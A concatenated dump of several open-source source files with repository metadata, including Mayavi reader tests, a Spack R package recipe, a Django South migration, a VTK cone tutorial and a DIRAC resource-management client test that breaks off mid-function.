ndx = combo.get_active()
notebook = self.builder.get_object("otherTypeNotebook")
findButton = self.builder.get_object("otherFindButton")
clearButton = self.builder.get_object("otherClearButton")
findButton.set_sensitive(ndx != 0)
clearButton.set_sensitive(ndx != 0)
notebook.set_current_page(ndx)
|
itoed/anaconda
|
pyanaconda/ui/gui/spokes/filter.py
|
Python
|
gpl-2.0
| 23,725
|
[
"VisIt"
] |
2f99f5c96ab3473448ec421da998c88d6077b594a2014acfded032e5582866b7
|
# -*- coding: utf-8 -*-
# vim: autoindent shiftwidth=4 expandtab textwidth=120 tabstop=4 softtabstop=4
###############################################################################
# OpenLP - Open Source Lyrics Projection #
# --------------------------------------------------------------------------- #
# Copyright (c) 2008-2013 Raoul Snyman #
# Portions copyright (c) 2008-2013 Tim Bentley, Gerald Britton, Jonathan #
# Corwin, Samuel Findlay, Michael Gorven, Scott Guerrieri, Matthias Hub, #
# Meinert Jordan, Armin Köhler, Erik Lundin, Edwin Lunando, Brian T. Meyer. #
# Joshua Miller, Stevan Pettit, Andreas Preikschat, Mattias Põldaru, #
# Christian Richter, Philip Ridout, Simon Scudder, Jeffrey Smith, #
# Maikel Stuivenberg, Martin Thompson, Jon Tibble, Dave Warnock, #
# Frode Woldsund, Martin Zibricky, Patrick Zimmermann #
# --------------------------------------------------------------------------- #
# This program is free software; you can redistribute it and/or modify it #
# under the terms of the GNU General Public License as published by the Free #
# Software Foundation; version 2 of the License. #
# #
# This program is distributed in the hope that it will be useful, but WITHOUT #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for #
# more details. #
# #
# You should have received a copy of the GNU General Public License along #
# with this program; if not, write to the Free Software Foundation, Inc., 59 #
# Temple Place, Suite 330, Boston, MA 02111-1307 USA #
###############################################################################
"""
The file rename dialog.
"""
from PyQt4 import QtGui
from filerenamedialog import Ui_FileRenameDialog
from openlp.core.lib import translate
class FileRenameForm(QtGui.QDialog, Ui_FileRenameDialog):
"""
The file rename dialog
"""
def __init__(self, parent):
"""
Constructor
"""
QtGui.QDialog.__init__(self, parent)
self.setupUi(self)
def exec_(self, copy=False):
"""
Run the Dialog with correct heading.
"""
if copy:
self.setWindowTitle(translate('OpenLP.FileRenameForm', 'File Copy'))
else:
self.setWindowTitle(translate('OpenLP.FileRenameForm', 'File Rename'))
return QtGui.QDialog.exec_(self)
|
marmyshev/transitions
|
openlp/core/ui/filerenameform.py
|
Python
|
gpl-2.0
| 2,842
|
[
"Brian"
] |
264fea9242d72451cebdf81356acf8d3f4fed5fa164fe3490e5afe8a9c94a647
|
# Author: Suyog Dutt Jain <suyog.jain@aero.iitb.ac.in>
# Copyright (c) 2009-2015, Enthought, Inc.
# License: BSD Style.
# Standard library imports.
import unittest
# Local imports.
from .common import get_example_data
# Enthought library imports
from mayavi.sources.poly_data_reader import PolyDataReader
from mayavi.tests.data_reader_test_base import DataReaderTestBase
# External library imports
import vtk
vtk_major_version = vtk.vtkVersion.GetVTKMajorVersion()
vtk_minor_version = vtk.vtkVersion.GetVTKMinorVersion()
class TestPDBReader(DataReaderTestBase):
def setup_reader(self):
""""Setup the reader in here. This is called after the engine
has been created and started. The engine is available as
self.e. This method is called by setUp().
"""
# Read a PDB data file.
r = PolyDataReader()
r.initialize(get_example_data('caffeine.pdb'))
self.e.add_source(r)
self.bounds = (3.10, 10.78, -2.39, 4.03, -10.60, -6.31)
def test_pdb_data_reader(self):
"Test if the test fixture works"
#Now test.
self.check(self.scene, self.bounds)
def test_save_and_restore(self):
"""Test if saving a visualization and restoring it works."""
self.check_saving(self.e, self.scene, self.bounds)
def test_deepcopied(self):
"""Test if the MayaVi2 visualization can be deep-copied."""
############################################################
# Test if the MayaVi2 visualization can be deep-copied.
self.check_deepcopying(self.scene, self.bounds)
class TestBYUReader(DataReaderTestBase):
def setup_reader(self):
""""Setup the reader in here. This is called after the engine
has been created and started. The engine is available as
self.e. This method is called by setUp().
"""
# Read a BYU data file.
r = PolyDataReader()
r.initialize(get_example_data('cow.g'))
self.e.add_source(r)
self.bounds = (-4.445, 5.998, -3.608, 2.760, -1.690, 1.690)
def test_byu_data_reader(self):
"Test if the test fixture works"
#Now test.
self.check(self.scene, self.bounds)
def test_save_and_restore(self):
"""Test if saving a visualization and restoring it works."""
self.check_saving(self.e, self.scene, self.bounds)
def test_deepcopied(self):
"""Test if the MayaVi2 visualization can be deep-copied."""
############################################################
# Test if the MayaVi2 visualization can be deep-copied.
self.check_deepcopying(self.scene, self.bounds)
class TestOBJReader(DataReaderTestBase):
def setup_reader(self):
""""Setup the reader in here. This is called after the engine
has been created and started. The engine is available as
self.e. This method is called by setUp().
"""
# Read a OBJ data file.
r = PolyDataReader()
r.initialize(get_example_data('shuttle.obj'))
self.e.add_source(r)
self.bounds = (-7.65, 7.04, -4.68, 4.68, -1.35, 4.16)
def test_obj_data_reader(self):
"Test if the test fixture works"
#Now test.
self.check(self.scene, self.bounds)
def test_save_and_restore(self):
"""Test if saving a visualization and restoring it works."""
self.check_saving(self.e, self.scene, self.bounds)
def test_deepcopied(self):
"""Test if the MayaVi2 visualization can be deep-copied."""
############################################################
# Test if the MayaVi2 visualization can be deep-copied.
self.check_deepcopying(self.scene, self.bounds)
class TestParticleReader(DataReaderTestBase):
def setup_reader(self):
""""Setup the reader in here. This is called after the engine
has been created and started. The engine is available as
self.e. This method is called by setUp().
"""
# Read a Particle data file.
r = PolyDataReader()
r.initialize(get_example_data('Particles.raw'))
self.e.add_source(r)
r.reader.set(data_byte_order='big_endian', data_type='float', file_type='binary')
self.bounds = (817.33, 826.09, 545.02, 571.02, 1443.48, 1511.18)
def test_particle_data_reader(self):
"Test if the test fixture works"
#Now test.
self.check(self.scene, self.bounds)
def test_save_and_restore(self):
"""Test if saving a visualization and restoring it works."""
self.check_saving(self.e, self.scene, self.bounds)
def test_deepcopied(self):
"""Test if the MayaVi2 visualization can be deep-copied."""
############################################################
# Test if the MayaVi2 visualization can be deep-copied.
self.check_deepcopying(self.scene, self.bounds)
class TestPLYReader(DataReaderTestBase):
def setup_reader(self):
""""Setup the reader in here. This is called after the engine
has been created and started. The engine is available as
self.e. This method is called by setUp().
"""
# Read a PLY data file.
r = PolyDataReader()
r.initialize(get_example_data('pyramid.ply'))
self.e.add_source(r)
self.bounds = (0.0, 1.0, 0.0, 1.0, 0.0, 1.60)
def test_ply_data_reader(self):
"Test if the test fixture works"
if vtk_major_version == 5 and vtk_minor_version in [6, 8]:
raise unittest.SkipTest('PLY reader broken in this version of VTK')
#Now test.
self.check(self.scene, self.bounds)
def test_save_and_restore(self):
"""Test if saving a visualization and restoring it works."""
if vtk_major_version == 5 and vtk_minor_version in [6, 8]:
raise unittest.SkipTest('PLY reader broken in this version of VTK')
self.check_saving(self.e, self.scene, self.bounds)
def test_deepcopied(self):
"""Test if the MayaVi2 visualization can be deep-copied."""
############################################################
# Test if the MayaVi2 visualization can be deep-copied.
if vtk_major_version == 5 and vtk_minor_version in [6, 8]:
raise unittest.SkipTest('PLY reader broken in this version of VTK')
self.check_deepcopying(self.scene, self.bounds)
class TestPointsReader(DataReaderTestBase):
def setup_reader(self):
""""Setup the reader in here. This is called after the engine
has been created and started. The engine is available as
self.e. This method is called by setUp().
"""
# Read a Points data file.
r = PolyDataReader()
r.initialize(get_example_data('points.txt'))
self.e.add_source(r)
self.bounds = (0.0, 1.0, 0.0, 1.0, 0.0, 1.0)
def test_points_data_reader(self):
"Test if the test fixture works"
#Now test.
self.check(self.scene, self.bounds)
def test_save_and_restore(self):
"""Test if saving a visualization and restoring it works."""
self.check_saving(self.e, self.scene, self.bounds)
def test_deepcopied(self):
"""Test if the MayaVi2 visualization can be deep-copied."""
############################################################
# Test if the MayaVi2 visualization can be deep-copied.
self.check_deepcopying(self.scene, self.bounds)
class TestSTLReader(DataReaderTestBase):
def setup_reader(self):
""""Setup the reader in here. This is called after the engine
has been created and started. The engine is available as
self.e. This method is called by setUp().
"""
# Read a STL data file.
r = PolyDataReader()
r.initialize(get_example_data('humanoid_tri.stla'))
self.e.add_source(r)
self.bounds = (0.60, 3.47, -3.96, 3.95, 3.05, 17.39)
def test_stl_data_reader(self):
"Test if the test fixture works"
#Now test.
self.check(self.scene, self.bounds)
def test_save_and_restore(self):
"""Test if saving a visualization and restoring it works."""
self.check_saving(self.e, self.scene, self.bounds)
def test_deepcopied(self):
"""Test if the MayaVi2 visualization can be deep-copied."""
############################################################
# Test if the MayaVi2 visualization can be deep-copied.
self.check_deepcopying(self.scene, self.bounds)
class TestFacetReader(DataReaderTestBase):
def setup_reader(self):
""""Setup the reader in here. This is called after the engine
has been created and started. The engine is available as
self.e. This method is called by setUp().
"""
# Read a Facet data file.
r = PolyDataReader()
r.initialize(get_example_data('clown.facet'))
self.e.add_source(r)
self.bounds = (-0.5, 0.69, -0.49, 0.49, -1.09, 0.5)
def test_facet_data_reader(self):
"Test if the test fixture works"
#Now test.
self.check(self.scene, self.bounds)
def test_save_and_restore(self):
"""Test if saving a visualization and restoring it works."""
self.check_saving(self.e, self.scene, self.bounds)
def test_deepcopied(self):
"""Test if the MayaVi2 visualization can be deep-copied."""
############################################################
# Test if the MayaVi2 visualization can be deep-copied.
self.check_deepcopying(self.scene, self.bounds)
class TestSLCReader(DataReaderTestBase):
def setup_reader(self):
""""Setup the reader in here. This is called after the engine
has been created and started. The engine is available as
self.e. This method is called by setUp().
"""
# Read a SLC data file.
r = PolyDataReader()
r.initialize(get_example_data('nut.slc'))
self.e.add_source(r)
self.bounds = (0.0, 67.0, 0.0, 40.0, 0.0, 58.0)
def test_slc_data_reader(self):
"Test if the test fixture works"
#Now test.
self.check(self.scene, self.bounds)
def test_save_and_restore(self):
"""Test if saving a visualization and restoring it works."""
self.check_saving(self.e, self.scene, self.bounds)
def test_deepcopied(self):
"""Test if the MayaVi2 visualization can be deep-copied."""
############################################################
# Test if the MayaVi2 visualization can be deep-copied.
self.check_deepcopying(self.scene, self.bounds)
if __name__ == '__main__':
unittest.main()
|
dmsurti/mayavi
|
mayavi/tests/test_poly_data_reader.py
|
Python
|
bsd-3-clause
| 10,834
|
[
"Mayavi",
"VTK"
] |
b1d80c0d8b6f1a428849aef5beb106bd1b0ebaa30d1dcd4ac6106fb6dc748f07
|
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RComplexheatmap(RPackage):
"""Complex heatmaps are efficient to visualize associations between
different sources of data sets and reveal potential structures. Here
the ComplexHeatmap package provides a highly flexible way to arrange
multiple heatmaps and supports self-defined annotation graphics."""
homepage = "https://bioconductor.org/packages/ComplexHeatmap/"
url = "https://git.bioconductor.org/packages/ComplexHeatmap"
list_url = homepage
version('1.14.0', git='https://git.bioconductor.org/packages/ComplexHeatmap', commit='0acd8974fb5cedde8cd96efea6dfa39324d25b34')
depends_on('r-circlize', type=('build', 'run'))
depends_on('r-getoptlong', type=('build', 'run'))
depends_on('r-colorspace', type=('build', 'run'))
depends_on('r-rcolorbrewer', type=('build', 'run'))
depends_on('r-dendextend', type=('build', 'run'))
depends_on('r-globaloptions', type=('build', 'run'))
depends_on('r@3.4.0:3.4.9', when='@1.14.0')
|
EmreAtes/spack
|
var/spack/repos/builtin/packages/r-complexheatmap/package.py
|
Python
|
lgpl-2.1
| 2,261
|
[
"Bioconductor"
] |
3f51ac0480195271dd3dc4da0f621bbe1e4bfcd76d2ed3bd97797726fa091703
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'NeuronEphysLink.num_reps'
db.add_column('neuroelectro_neuronephyslink', 'num_reps', self.gf('django.db.models.fields.IntegerField')(null=True), keep_default=False)
def backwards(self, orm):
# Deleting field 'NeuronEphysLink.num_reps'
db.delete_column('neuroelectro_neuronephyslink', 'num_reps')
models = {
'neuroelectro.article': {
'Meta': {'object_name': 'Article'},
'abstract': ('django.db.models.fields.CharField', [], {'max_length': '10000', 'null': 'True'}),
'full_text_link': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'journal': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Journal']", 'null': 'True'}),
'pmid': ('django.db.models.fields.IntegerField', [], {}),
'substances': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.Substance']", 'null': 'True', 'symmetrical': 'False'}),
'terms': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.MeshTerm']", 'null': 'True', 'symmetrical': 'False'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
'neuroelectro.articlefulltext': {
'Meta': {'object_name': 'ArticleFullText'},
'article': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Article']"}),
'full_text': ('picklefield.fields.PickledObjectField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'neuroelectro.brainregion': {
'Meta': {'object_name': 'BrainRegion'},
'abbrev': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'allenid': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True'}),
'color': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'isallen': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'treedepth': ('django.db.models.fields.IntegerField', [], {'null': 'True'})
},
'neuroelectro.datatable': {
'Meta': {'object_name': 'DataTable'},
'article': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Article']"}),
'ephys_props': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.EphysProp']", 'null': 'True', 'symmetrical': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'neurons': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.Neuron']", 'null': 'True', 'symmetrical': 'False'}),
'table_html': ('picklefield.fields.PickledObjectField', [], {'null': 'True'}),
'table_text': ('django.db.models.fields.CharField', [], {'max_length': '10000', 'null': 'True'})
},
'neuroelectro.datatabletag': {
'Meta': {'object_name': 'DataTableTag'},
'ephys_prop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.EphysProp']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'neuron': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Neuron']"})
},
'neuroelectro.ephysprop': {
'Meta': {'object_name': 'EphysProp'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'unit': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'})
},
'neuroelectro.ephyspropsyn': {
'Meta': {'object_name': 'EphysPropSyn'},
'ephys_prop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.EphysProp']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'term': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'neuroelectro.insituexpt': {
'Meta': {'object_name': 'InSituExpt'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'imageseriesid': ('django.db.models.fields.IntegerField', [], {}),
'plane': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'regionexprs': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.RegionExpr']", 'null': 'True', 'symmetrical': 'False'}),
'valid': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'neuroelectro.journal': {
'Meta': {'object_name': 'Journal'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '300'})
},
'neuroelectro.meshterm': {
'Meta': {'object_name': 'MeshTerm'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'term': ('django.db.models.fields.CharField', [], {'max_length': '300'})
},
'neuroelectro.neuron': {
'Meta': {'object_name': 'Neuron'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'nlex_id': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'regions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.BrainRegion']", 'null': 'True', 'symmetrical': 'False'}),
'synonyms': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.NeuronSyn']", 'null': 'True', 'symmetrical': 'False'})
},
'neuroelectro.neuronephyslink': {
'Meta': {'object_name': 'NeuronEphysLink'},
'data_table': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.DataTable']"}),
'ephys_prop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.EphysProp']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'neuron': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Neuron']"}),
'num_reps': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'val': ('django.db.models.fields.FloatField', [], {}),
'val_err': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'neuroelectro.neuronsyn': {
'Meta': {'object_name': 'NeuronSyn'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'term': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
'neuroelectro.protein': {
'Meta': {'object_name': 'Protein'},
'allenid': ('django.db.models.fields.IntegerField', [], {}),
'common_name': ('django.db.models.fields.CharField', [], {'max_length': '400', 'null': 'True'}),
'entrezid': ('django.db.models.fields.IntegerField', [], {}),
'gene': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_situ_expts': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.InSituExpt']", 'null': 'True', 'symmetrical': 'False'}),
'is_channel': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '400'}),
'synonyms': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.ProteinSyn']", 'null': 'True', 'symmetrical': 'False'})
},
'neuroelectro.proteinsyn': {
'Meta': {'object_name': 'ProteinSyn'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'term': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
'neuroelectro.regionexpr': {
'Meta': {'object_name': 'RegionExpr'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'default': '0', 'to': "orm['neuroelectro.BrainRegion']"}),
'val': ('django.db.models.fields.FloatField', [], {})
},
'neuroelectro.species': {
'Meta': {'object_name': 'Species'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'specie': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
'neuroelectro.substance': {
'Meta': {'object_name': 'Substance'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'term': ('django.db.models.fields.CharField', [], {'max_length': '300'})
},
'neuroelectro.superprotein': {
'Meta': {'object_name': 'SuperProtein'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_channel': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '400'}),
'synonyms': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.ProteinSyn']", 'null': 'True', 'symmetrical': 'False'})
}
}
complete_apps = ['neuroelectro']
|
lessc0de/neuroelectro_org
|
neuroelectro/south_migrations/0016_auto__add_field_neuronephyslink_num_reps.py
|
Python
|
gpl-2.0
| 10,641
|
[
"NEURON"
] |
15c7b912899d08b86faeec7d5c3e0a774e9549e8adc88fb00d5b17c13251b45c
|
#!/usr/bin/env python
#
# This example creates a polygonal model of a cone, and then renders it to
# the screen. It will rotate the cone 360 degrees and then exit. The basic
# setup of source -> mapper -> actor -> renderer -> renderwindow is
# typical of most VTK programs.
#
#
# First we include the VTK Python packages that will make available
# all of the VTK commands to Python.
#
import vtk
import time
#
# Next we create an instance of vtkConeSource and set some of its
# properties. The instance of vtkConeSource "cone" is part of a visualization
# pipeline (it is a source process object); it produces data (output type is
# vtkPolyData) which other filters may process.
#
cone = vtk.vtkConeSource()
cone.SetHeight( 3.0 )
cone.SetRadius( 1.0 )
cone.SetResolution( 10 )
#
# In this example we terminate the pipeline with a mapper process object.
# (Intermediate filters such as vtkShrinkPolyData could be inserted in
# between the source and the mapper.) We create an instance of
# vtkPolyDataMapper to map the polygonal data into graphics primitives. We
# connect the output of the cone souece to the input of this mapper.
#
coneMapper = vtk.vtkPolyDataMapper()
coneMapper.SetInputConnection( cone.GetOutputPort() )
#
# Create an actor to represent the cone. The actor orchestrates rendering of
# the mapper's graphics primitives. An actor also refers to properties via a
# vtkProperty instance, and includes an internal transformation matrix. We
# set this actor's mapper to be coneMapper which we created above.
#
coneActor = vtk.vtkActor()
coneActor.SetMapper( coneMapper )
#
# Create the Renderer and assign actors to it. A renderer is like a
# viewport. It is part or all of a window on the screen and it is
# responsible for drawing the actors it has. We also set the background
# color here
#
ren1= vtk.vtkRenderer()
ren1.AddActor( coneActor )
ren1.SetBackground( 0.1, 0.2, 0.4 )
#
# Finally we create the render window which will show up on the screen
# We put our renderer into the render window using AddRenderer. We also
# set the size to be 300 pixels by 300
#
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer( ren1 )
renWin.SetSize( 300, 300 )
#
# now we loop over 360 degreeees and render the cone each time
#
for i in range(0,360):
time.sleep(0.03)
renWin.Render()
ren1.GetActiveCamera().Azimuth( 1 )
|
hlzz/dotfiles
|
graphics/VTK-7.0.0/Examples/Tutorial/Step1/Python/Cone.py
|
Python
|
bsd-3-clause
| 2,419
|
[
"VTK"
] |
9cea435c570b40824ece37eaced3b7b806778c0cd31a50f4e39d10b64ce7a1a4
|
''' This is a test of the chain
ResourceManagementClient -> ResourceManagementHandler -> ResourceManagementDB
It supposes that the DB is present, and that the service is running
The DB is supposed to be empty when the test starts
'''
# pylint: disable=invalid-name,wrong-import-position
import sys
import datetime
import unittest
from DIRAC.Core.Base.Script import parseCommandLine
parseCommandLine()
from DIRAC import gLogger
from DIRAC.ResourceStatusSystem.Client.ResourceManagementClient import ResourceManagementClient
gLogger.setLevel('DEBUG')
dateEffective = datetime.datetime.now()
lastCheckTime = datetime.datetime.now()
class TestClientResourceManagementTestCase(unittest.TestCase):
def setUp(self):
self.rmClient = ResourceManagementClient()
def tearDown(self):
pass
class ResourceManagementClientChain(TestClientResourceManagementTestCase):
def test_AccountingCache(self):
"""
DowntimeCache table
"""
res = self.rmClient.deleteAccountingCache('TestName12345') # just making sure it's not there (yet)
self.assertTrue(res['OK'])
# TEST addOrModifyAccountingCache
res = self.rmClient.addOrModifyAccountingCache('TestName12345', 'plotType', 'plotName', 'result',
datetime.datetime.now(), datetime.datetime.now())
self.assertTrue(res['OK'])
res = self.rmClient.selectAccountingCache('TestName12345')
self.assertTrue(res['OK'])
# check if the name that we got is equal to the previously added 'TestName12345'
self.assertEqual(res['Value'][0][0], 'TestName12345')
res = self.rmClient.addOrModifyAccountingCache('TestName12345', 'plotType', 'plotName', 'changedresult',
dateEffective, lastCheckTime)
self.assertTrue(res['OK'])
res = self.rmClient.selectAccountingCache('TestName12345')
# check if the result has changed
self.assertEqual(res['Value'][0][4], 'changedresult')
# TEST deleteAccountingCache
# ...............................................................................
res = self.rmClient.deleteAccountingCache('TestName12345')
self.assertTrue(res['OK'])
res = self.rmClient.selectAccountingCache('TestName12345')
self.assertTrue(res['OK'])
self.assertFalse(res['Value'])
def test_DowntimeCache(self):
"""
DowntimeCache table
"""
res = self.rmClient.deleteDowntimeCache('TestName12345') # just making sure it's not there (yet)
self.assertTrue(res['OK'])
# TEST addOrModifyDowntimeCache
res = self.rmClient.addOrModifyDowntimeCache('TestName12345', 'element', 'name',
datetime.datetime.now(), datetime.datetime.now(),
'severity', 'description', 'link',
datetime.datetime.now(), datetime.datetime.now(),
'gOCDBServiceType')
self.assertTrue(res['OK'])
res = self.rmClient.selectDowntimeCache('TestName12345')
self.assertTrue(res['OK'])
# check if the name that we got is equal to the previously added 'TestName12345'
self.assertEqual(res['Value'][0][0], 'TestName12345')
res = self.rmClient.addOrModifyDowntimeCache('TestName12345', 'element', 'name', severity='changedSeverity')
self.assertTrue(res['OK'])
res = self.rmClient.selectDowntimeCache('TestName12345')
# check if the result has changed
self.assertEqual(res['Value'][0][4], 'changedSeverity')
# TEST deleteDowntimeCache
# ...............................................................................
res = self.rmClient.deleteDowntimeCache('TestName12345')
self.assertTrue(res['OK'])
res = self.rmClient.selectDowntimeCache('TestName12345')
self.assertTrue(res['OK'])
self.assertFalse(res['Value'])
def test_GGUSTicketsCache(self):
"""
GGUSTicketsCache table
"""
res = self.rmClient.deleteGGUSTicketsCache('TestName12345') # just making sure it's not there (yet)
self.assertTrue(res['OK'])
# TEST addOrModifyGGUSTicketsCache
res = self.rmClient.addOrModifyGGUSTicketsCache('TestName12345', 'link', 0, 'tickets', datetime.datetime.now())
self.assertTrue(res['OK'])
res = self.rmClient.selectGGUSTicketsCache('TestName12345')
self.assertTrue(res['OK'])
# check if the name that we got is equal to the previously added 'TestName12345'
self.assertEqual(res['Value'][0][0], 'TestName12345')
res = self.rmClient.addOrModifyGGUSTicketsCache('TestName12345', 'newLink')
self.assertTrue(res['OK'])
res = self.rmClient.selectGGUSTicketsCache('TestName12345')
# check if the result has changed
self.assertEqual(res['Value'][0][3], 'newLink')
# TEST deleteGGUSTicketsCache
# ...............................................................................
res = self.rmClient.deleteGGUSTicketsCache('TestName12345')
self.assertTrue(res['OK'])
res = self.rmClient.selectGGUSTicketsCache('TestName12345')
self.assertTrue(res['OK'])
self.assertFalse(res['Value'])
def test_JobCache(self):
"""
JobCache table
"""
res = self.rmClient.deleteJobCache('TestName12345') # just making sure it's not there (yet)
self.assertTrue(res['OK'])
# TEST addOrModifyJobCache
res = self.rmClient.addOrModifyJobCache('TestName12345', 'maskstatus', 50.89, 'status', datetime.datetime.now())
self.assertTrue(res['OK'])
res = self.rmClient.selectJobCache('TestName12345')
self.assertTrue(res['OK'])
# check if the name that we got is equal to the previously added 'TestName12345'
self.assertEqual(res['Value'][0][0], 'TestName12345')
res = self.rmClient.addOrModifyJobCache('TestName12345', status='newStatus')
self.assertTrue(res['OK'])
res = self.rmClient.selectJobCache('TestName12345')
# check if the result has changed
self.assertEqual(res['Value'][0][1], 'newStatus')
# TEST deleteJobCache
# ...............................................................................
res = self.rmClient.deleteJobCache('TestName12345')
self.assertTrue(res['OK'])
res = self.rmClient.selectJobCache('TestName12345')
self.assertTrue(res['OK'])
self.assertFalse(res['Value'])
def test_PilotCache(self):
"""
PilotCache table
"""
res = self.rmClient.deletePilotCache('TestName12345') # just making sure it's not there (yet)
self.assertTrue(res['OK'])
# TEST addOrModifyPilotCache
res = self.rmClient.addOrModifyPilotCache('TestName12345', 'CE', 0.0, 25.5, 'status', datetime.datetime.now())
self.assertTrue(res['OK'])
res = self.rmClient.selectPilotCache('TestName12345')
self.assertTrue(res['OK'])
# check if the name that we got is equal to the previously added 'TestName12345'
self.assertEqual(res['Value'][0][0], 'TestName12345')
res = self.rmClient.addOrModifyPilotCache('TestName12345', status='newStatus')
self.assertTrue(res['OK'])
res = self.rmClient.selectPilotCache('TestName12345')
# check if the result has changed
self.assertEqual(res['Value'][0][2], 'newStatus')
# TEST deletePilotCache
# ...............................................................................
res = self.rmClient.deletePilotCache('TestName12345')
self.assertTrue(res['OK'])
res = self.rmClient.selectPilotCache('TestName12345')
self.assertTrue(res['OK'])
self.assertFalse(res['Value'])
def test_PolicyResult(self):
"""
PolicyResult table
"""
res = self.rmClient.deletePolicyResult('element', 'TestName12345',
'policyName', 'statusType') # just making sure it's not there (yet)
self.assertTrue(res['OK'])
# TEST addOrModifyPolicyResult
res = self.rmClient.addOrModifyPolicyResult('element', 'TestName12345', 'policyName',
'statusType', 'status', 'reason',
datetime.datetime.now(), datetime.datetime.now())
self.assertTrue(res['OK'])
res = self.rmClient.selectPolicyResult('element', 'TestName12345', 'policyName', 'statusType')
self.assertTrue(res['OK'])
# check if the name that we got is equal to the previously added 'TestName12345'
self.assertEqual(res['Value'][0][1], 'statusType')
res = self.rmClient.addOrModifyPolicyResult('element', 'TestName12345', 'policyName', 'statusType',
status='newStatus')
self.assertTrue(res['OK'])
